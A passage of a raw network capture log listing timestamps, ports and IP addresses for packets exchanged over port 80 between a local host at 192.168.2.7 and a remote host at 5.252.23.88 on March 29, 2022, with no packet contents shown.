Mar 29, 2022 06:51:53.295749903 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295773029 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295775890 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295780897 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295797110 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295819998 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295844078 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295845985 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295850039 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295867920 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295890093 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295912981 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295934916 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295936108 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295941114 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295960903 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295985937 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295996904 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296001911 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296010017 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296032906 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296056986 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296065092 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296067953 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296081066 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296103954 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296128988 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296132088 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296135902 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296152115 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296175957 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296181917 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296185970 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296199083 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296222925 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296247959 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296266079 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296269894 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296272039 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296293974 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296317101 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296329021 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296331882 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296339989 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296363115 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296386003 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296403885 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296406984 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296410084 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296432018 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296454906 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296473980 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296477079 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296479940 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296504974 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296528101 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296546936 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296550989 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296550035 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296572924 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296596050 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296613932 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296617985 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296618938 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296641111 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296665907 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296684027 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296688080 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296688080 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296710968 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296734095 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296753883 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296756029 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296756983 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296778917 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296802998 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296814919 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296818018 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296825886 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296849966 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296871901 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296890020 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296894073 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296895027 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296919107 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296941042 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296951056 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296953917 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.296963930 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.296987057 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.297009945 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.297032118 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.297034979 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.297403097 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.326881886 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.326927900 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.326961040 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.326992989 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327022076 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327039003 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327050924 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327069998 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327100992 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327119112 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327120066 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327130079 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327131987 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327143908 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327151060 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327178001 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327178955 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327210903 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327244043 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327249050 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327250957 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327254057 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327279091 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327284098 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327331066 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327333927 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327337980 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327354908 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327370882 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327394962 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327399015 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327405930 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327429056 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327450037 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327455044 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327455997 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327460051 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327477932 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327496052 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327497959 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327502012 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327512980 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327528954 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327544928 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327560902 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327575922 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327585936 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327589035 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327590942 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327590942 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327609062 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327622890 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327644110 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327649117 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327650070 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327652931 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327666044 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327682018 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327697039 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327706099 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327712059 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327729940 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327733994 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327745914 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327761889 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327776909 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327786922 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327790022 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327795029 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327815056 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327826023 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327831984 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327847004 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327864885 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327872992 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327873945 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327891111 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327891111 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327905893 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327925920 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327941895 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327945948 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327950954 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.327956915 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327972889 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.327987909 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.328001976 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.328144073 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.328227043 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.328231096 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.357965946 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358037949 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358088017 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358202934 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358203888 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358237028 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358242989 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358253956 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358258009 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358300924 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358350992 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358354092 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358362913 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358397961 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358423948 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358450890 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358493090 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358495951 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358505964 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358541965 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358582973 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358601093 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358608961 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358633995 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358639002 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358685970 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358726025 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358748913 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358761072 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358772993 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358814001 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358829021 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358839035 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358858109 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358899117 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358911991 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358932018 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358939886 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.358948946 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.358997107 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359038115 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359056950 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359070063 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359086037 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359096050 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359153986 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359201908 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359206915 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359217882 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359245062 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359289885 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359294891 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359298944 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359333992 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359379053 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359388113 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359399080 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359426975 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359478951 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359534025 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359549046 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359559059 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359564066 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359580994 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359595060 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359636068 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359688044 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359689951 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359703064 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359729052 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359767914 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359791994 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359805107 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359816074 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359824896 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359848976 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359889984 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359901905 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359945059 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359957933 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.359962940 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.359994888 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360038042 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360061884 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360074043 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360091925 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360105991 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360115051 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360177040 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360178947 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360186100 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360230923 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360240936 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360300064 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360349894 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360361099 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360402107 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360403061 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360409021 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360441923 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360483885 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360502958 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360512972 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360527039 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360573053 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360582113 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360589981 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360615015 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360660076 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360660076 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360668898 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360704899 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360734940 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360759020 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360805035 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360806942 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360816002 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360855103 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360909939 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360929012 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.360930920 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360965014 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.360986948 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.361002922 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.361049891 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.361051083 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.361057997 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.361095905 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.361112118 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.361135960 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.361177921 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.361196041 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.361206055 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.361216068 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.361237049 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.361258984 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.361287117 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.361306906 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.361311913 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.361341953 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.361393929 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.361397028 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.361406088 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.361413956 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.361465931 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.361478090 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.361505032 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.361531019 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.361576080 CEST	80	49793	5.252.23.88	192.168.2.7
